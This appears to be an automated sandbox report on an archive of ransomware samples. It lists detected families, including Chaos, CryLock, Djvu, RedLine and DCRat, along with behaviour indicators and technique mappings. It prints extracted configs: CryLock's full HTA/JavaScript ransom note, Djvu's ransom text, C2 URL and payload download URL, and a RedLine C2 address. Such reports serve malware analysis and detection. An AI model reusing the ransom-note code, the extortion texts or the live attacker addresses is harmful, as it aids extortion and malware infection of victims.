chaos | 18c5384ce36acefcb3d0d949ac3de2f701e2e57c3b8c5c854e88e76a429fc931

Analysis

max time kernel
76s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-10-2024 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00451.7z
Size

100.8MB
MD5

25a26a65430350a0022581102fff29a3
SHA1

b272ad0783256581bfd8d8f4ccfb3e94bc11e012
SHA256

18c5384ce36acefcb3d0d949ac3de2f701e2e57c3b8c5c854e88e76a429fc931
SHA512

f2aa335691a17a08ce1bce135504ececd2360cf25b1ce0ab451a30529ac8dc447279b415b66e57f962e5453a49e79c87f138b0a3d3998d23776d2a3e1d0eab69
SSDEEP

1572864:Vi65n/L7luWRrheZg1926N6cQ2DMT8BgOt5BhW6qgWYL+uExniEdiEkg/N:Vd5vluWR1eWa6NN3DM4SOXX0sOHkM

Malware Config

Extracted

Family

crylock

Attributes

emails
[email protected]

[email protected]
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var ud=0; var op=0xc7bf30; var zoc=0; function document.onkeydown() { var alt=window.event.altKey; if (event.keyCode==116 || event.keyCode==27 || alt && event.keyCode==115) { event.keyCode=0; event.cancelBubble=true; return false; } } function document.onblur() { alert('Attention! This important information for you!'); } function ChangeTime() { var sd = new Date('<%DOUBLE_DATETIME%>'); var dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('pwr'); dt.innerHTML='<font color="red" size="5"><b>Price is raised!</b></font>'; dt.style.height=78; zoc=1; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('dt'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } var sd = new Date('<%UNDECRYPT_DATETIME%>'); dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('lctw'); dt.innerHTML='<font color="red" size="5"><b>Last chance to decrypt your files!</b></font>'; zoc=2; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('et'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { document.getElementById("blumid").focus(); var bid=document.getElementById('blumid'); var bem=document.getElementById('blummail'); if (ud==0) { op=op-0x10; } else { op=op+0x10; } if (op<=0xc00000) { ud=1; } if (op>=0xc7bf30) { ud=0; } bid.style.backgroundColor=op; bem.style.backgroundColor=op; var xx=''; var i=0; while (i<19) { xx=xx+getRandomArbitrary(0,2); i=i+1; } if (zoc==0) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="white" size="5"><b>'+xx+'</b></font>'; } else { if (zoc==1) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="5"><b>Price is raised!</b></font>'; } else { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="4"><b>Price is raised!<br>Last chance to decrypt your files!</b></font>'; } } } function Start() { window.resizeTo(800,500) setInterval(ChangeTime,1000); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background-color:#0066CC;" OnLoad="Start()"> <div id="pwr" align="center" style="position:absolute; top:10px; left:10px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Payment will be raised after</b></font> <br> <div id="dt"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div align="center" style="position:absolute; top:10px; left:170px; width:58%;"> <font face="monospace" color="white" size="4"><b>Your files have been encrypted...</b></font> </div> <div align="center" style="position:absolute; top:60px; left:170px; width:58%;"> <div id="rc"> <font face="monospace" color="white" size="5"><b>00000000000000000000</b></font> </div> </div> <div id="lctw" align="center" style="position:absolute; top:10px; left:620px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Your files will be leak after</b></font> <br> <div id="et"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div style="background-color:white;overflow-x:hide; overflow-y:scroll; position:absolute; top:100px; left:10px; width:768px; height:320px"> Decrypt files? Write to this mails: <font face="monospace" OnClick="copytext('<%MAIN_CONTACT%>')"><b><%MAIN_CONTACT%></b></font> or <font face="monospace" OnClick="copytext ('<[email protected]>')"><b><[email protected]></b></font>. mail <font face="monospace" OnClick="copytext('[email protected]')"><b>[email protected]</b></font>. <br> You unique ID <font face="monospace" OnClick="copytext('[<%HID%>]')"><b>[<%HID%>] <font size="2">[copy]</font></b></font> </div> <div title="Click to copy" OnClick="copytext('[<%HID%>]')" id="blumid" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:10px; width:380px; height:20px"> <b>Your ID [<%HID%>] <font size="2">[copy]</font></b> </div> <div title="Click to copy" OnClick="copytext('<%MAIN_CONTACT%>')" id="blummail" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:400px; width:380px; height:20px"> <b>Write to <%MAIN_CONTACT%> <font size="2">[copy]</font></b> </div> </body> </html>

rsa_pubkey.plain

Extracted

Family

djvu

http://astdg.top/nddddhsspen6/get.php

Attributes

extension
.gujd
offline_id
NcBG8wI6Q1WFhUNlCRyjmrWGeGew2vvCKtJgKot1
payload_url
http://securebiz.org/dl/build2.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0316ewgfDd

rsa_pubkey.plain

Extracted

Family

redline

Botnet

terrornax

45.88.3.176:17033

Signatures

Chaos
Ransomware family first seen in June 2021.
ransomware chaos

Chaos Ransomware 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000001e75a-271.dat	family_chaos
behavioral1/memory/1288-273-0x00000000000C0000-0x00000000000F6000-memory.dmp	family_chaos

Crylock
Ransomware family, which is a new variant of Cryakl ransomware.
ransomware crylock
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect MafiaWare666 ransomware 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023c97-369.dat	family_mafiaware666
behavioral1/memory/3128-379-0x0000000000B00000-0x0000000000C52000-memory.dmp	family_mafiaware666

Detect ZGRat V2 1 IoCs

resource	yara_rule
behavioral1/memory/5852-3549-0x0000000004DC0000-0x0000000004DFA000-memory.dmp	family_zgrat_v2

Detected Djvu ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/5024-1237-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/5024-1236-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
MafiaWare666 Ransomware
MafiaWare666 is ransomware written in C# with multiple variants.
ransomware mafiaware666

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8316	3484	rUNdlL32.eXe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	372	3484	rUNdlL32.eXe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10368	3484	rUNdlL32.eXe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10288	3484	rUNdlL32.eXe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3844	3484	rUNdlL32.eXe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10148	3484	rUNdlL32.eXe	92

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/12184-3602-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/12184-3602-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0007000000023ca0-976.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5184	powershell.exe
5020	powershell.exe
11692	powershell.exe
11020	powershell.exe
6644	powershell.exe
11216	powershell.exe
12224	powershell.exe
7884	powershell.exe
9192	powershell.exe
10184	powershell.exe
10972	powershell.exe
9056	powershell.exe
3944	powershell.exe
8016	powershell.exe
5196	powershell.exe
2316	powershell.exe
3932	powershell.exe
4616	powershell.exe
1980	powershell.exe
1608	powershell.exe

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0007000000023d62-3885.dat	aspack_v212_v242
behavioral1/files/0x0007000000023d72-3891.dat	aspack_v212_v242
behavioral1/files/0x0007000000023d82-3931.dat	aspack_v212_v242
behavioral1/files/0x0007000000023d85-3937.dat	aspack_v212_v242
behavioral1/files/0x0007000000023d83-3933.dat	aspack_v212_v242
behavioral1/files/0x0007000000023d87-3974.dat	aspack_v212_v242
behavioral1/files/0x0007000000023dc3-4317.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3ee5744817862d7e419d46ec2f89238c64d8fb18b3acf15863396143039bd63.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Executes dropped EXE 15 IoCs

pid	Process
1288	HEUR-Trojan-Ransom.MSIL.Agent.gen-bee28de2d33aad555f317d2d0eab8761be2439d18784cc55eb43292fa887cbfd.exe
2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe
4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe
1888	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2d294421b50fe8750ed5e2293f30c35428439e4906b0514f38a1d8eb65eca14.exe
448	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b130bf99d6b2926e0aa3f60407454bd1ee4453307d547a6e836bf1a60206abf4.exe
3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe
740	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b8f13f96d6c3d5b7a23d389e518963367e460f754a433a0e5e8765d702a99416.exe
4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe
2240	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe
1784	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3ee5744817862d7e419d46ec2f89238c64d8fb18b3acf15863396143039bd63.exe
892	HEUR-Trojan-Ransom.MSIL.Blocker.gen-e0570539e2c37c965ba77f0ba174cf3108c60c5ac5ca8aba0817d7ae0e6c939a.exe
2428	HEUR-Trojan-Ransom.MSIL.Blocker.gen-e7167517b12c9008ae1fe63077f255ecb027948d35ee7c232afe1fae6ef9e4b1.exe
3128	HEUR-Trojan-Ransom.MSIL.Crypren.gen-6ef93a6f17bded4b132a4ac81aa36d8a9952edcffd976e5c960143265b44b0a3.exe
5436	HEUR-Trojan-Ransom.MSIL.Encoder.gen-f85d0e5a44227717ee495b09ea81b79af918c4c29308c449c706a4990559817e.exe
6004	HEUR-Trojan-Ransom.MSIL.Foreign.gen-2cfb8c54a243f21147669f13c67adaa0f3cd9fc419fdc6dc01800e0679c0830f.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2260	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/2428-486-0x0000000006CC0000-0x0000000006CE8000-memory.dmp	agile_net

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000a000000023d86-4436.dat	vmprotect
behavioral1/files/0x000b000000023dba-4700.dat	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 38 IoCs

Web Service

T1102

flow	ioc
170	iplogger.org
209	iplogger.org
214	iplogger.org
269	iplogger.org
278	iplogger.org
89	iplogger.org
174	iplogger.org
279	iplogger.org
109	iplogger.org
175	iplogger.org
234	iplogger.org
238	iplogger.org
242	iplogger.org
353	iplogger.org
484	raw.githubusercontent.com
101	iplogger.org
208	iplogger.org
177	iplogger.org
243	raw.githubusercontent.com
270	iplogger.org
275	iplogger.org
100	iplogger.org
107	iplogger.org
273	iplogger.org
354	iplogger.org
511	raw.githubusercontent.com
88	iplogger.org
171	iplogger.org
216	iplogger.org
412	iplogger.org
178	iplogger.org
213	raw.githubusercontent.com
235	iplogger.org
244	iplogger.org
338	iplogger.org
411	iplogger.org
91	iplogger.org
215	raw.githubusercontent.com

Looks up external IP address via web service 24 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
140	ipinfo.io
146	ipinfo.io
154	api.db-ip.com
206	ipinfo.io
294	api.db-ip.com
499	freegeoip.app
61	api.2ip.ua
95	api.2ip.ua
130	ipinfo.io
131	ipinfo.io
263	api.db-ip.com
449	whatismyipaddress.com
463	freegeoip.app
464	freegeoip.app
121	checkip.dyndns.org
141	api.db-ip.com
143	api.db-ip.com
237	api.db-ip.com
284	ipinfo.io
451	whatismyipaddress.com
59	api.2ip.ua
160	api.db-ip.com
202	ipinfo.io
250	ipinfo.io

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c9c-640.dat	upx
behavioral1/memory/7284-652-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/7284-906-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/files/0x0009000000023de1-4939.dat	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 37 IoCs

pid	pid_target	Process	procid_target
10068	8648	WerFault.exe	234
10460	9388	WerFault.exe	255
10688	6284	WerFault.exe	196
9276	6108	WerFault.exe	164
740	6136	WerFault.exe	165
11112	4916	WerFault.exe	137
10708	5556	WerFault.exe	149
740	8736	WerFault.exe	322
11688	9420	WerFault.exe	362
392	11144	WerFault.exe	351
5920	11188	WerFault.exe	324
11860	7948	WerFault.exe	318
9548	9488	WerFault.exe	258
1724	10784	WerFault.exe	295
7600	9264	WerFault.exe	278
6188	8980	WerFault.exe	424
9324	7944	WerFault.exe	432
10092	3892	WerFault.exe	473
7124	11864	WerFault.exe	485
1860	10524	WerFault.exe	488
10288	5376	WerFault.exe	516
3276	3196	WerFault.exe	519
7956	2536	WerFault.exe	525
11656	9352	WerFault.exe	588
4436	6980	WerFault.exe	604
8724	6672	WerFault.exe	594
10092	6136	WerFault.exe	636
9568	3540	WerFault.exe	646
10972	10536	WerFault.exe	522
11360	4068	WerFault.exe	598
2012	7596	WerFault.exe	576
8252	9200	WerFault.exe	693
5532	6264	WerFault.exe	658
5172	10040	WerFault.exe	694
5212	8848	WerFault.exe	793
9368	12120	WerFault.exe	819
5932	11612	WerFault.exe	844

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-e7167517b12c9008ae1fe63077f255ecb027948d35ee7c232afe1fae6ef9e4b1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3ee5744817862d7e419d46ec2f89238c64d8fb18b3acf15863396143039bd63.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Encoder.gen-f85d0e5a44227717ee495b09ea81b79af918c4c29308c449c706a4990559817e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Crypren.gen-6ef93a6f17bded4b132a4ac81aa36d8a9952edcffd976e5c960143265b44b0a3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Foreign.gen-2cfb8c54a243f21147669f13c67adaa0f3cd9fc419fdc6dc01800e0679c0830f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b130bf99d6b2926e0aa3f60407454bd1ee4453307d547a6e836bf1a60206abf4.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
7572	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8820	schtasks.exe
5036	schtasks.exe
11016	schtasks.exe
11948	schtasks.exe
12224	schtasks.exe
5508	schtasks.exe
11072	schtasks.exe
9812	schtasks.exe
2356	schtasks.exe
11360	schtasks.exe
3876	schtasks.exe
7184	schtasks.exe
7208	schtasks.exe
3584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
2636	powershell.exe
1176	taskmgr.exe
1176	taskmgr.exe
2636	powershell.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3952	7zFM.exe
1176	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeRestorePrivilege	3952	7zFM.exe
Token: 35	3952	7zFM.exe
Token: SeSecurityPrivilege	3952	7zFM.exe
Token: SeDebugPrivilege	2728	taskmgr.exe
Token: SeSystemProfilePrivilege	2728	taskmgr.exe
Token: SeCreateGlobalPrivilege	2728	taskmgr.exe
Token: SeDebugPrivilege	1176	taskmgr.exe
Token: SeSystemProfilePrivilege	1176	taskmgr.exe
Token: SeCreateGlobalPrivilege	1176	taskmgr.exe
Token: 33	2728	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2728	taskmgr.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1288	HEUR-Trojan-Ransom.MSIL.Agent.gen-bee28de2d33aad555f317d2d0eab8761be2439d18784cc55eb43292fa887cbfd.exe
Token: SeDebugPrivilege	740	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b8f13f96d6c3d5b7a23d389e518963367e460f754a433a0e5e8765d702a99416.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	2428	HEUR-Trojan-Ransom.MSIL.Blocker.gen-e7167517b12c9008ae1fe63077f255ecb027948d35ee7c232afe1fae6ef9e4b1.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3952	7zFM.exe
3952	7zFM.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
